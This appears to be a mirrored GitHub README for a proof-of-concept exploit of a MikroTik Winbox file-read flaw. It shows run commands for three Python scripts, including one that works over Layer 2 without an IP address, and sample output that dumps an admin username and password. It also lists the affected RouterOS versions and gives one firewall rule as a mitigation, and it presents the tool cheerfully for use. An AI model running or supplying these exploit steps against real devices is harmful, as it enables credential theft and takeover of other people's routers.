| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Name | Name | Last commit date | ||
|---|---|---|---|---|
Proof of Concept of Winbox Critical Vulnerability
Arbitrary file read
https://n0p.me/winbox-bug-dissection/
Winbox (TCP/IP)
$ python3 WinboxExploit.py 172.17.17.17 User: admin Pass: Th3P4ssWord
MAC server Winbox (Layer 2)
You can extract files even if the device doesn't have an IP address :-)
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff User: admin Pass: Th3P4ssWord
all versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable ..
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
Enjoy!
| Back | FazBrowse Home | New Git URL |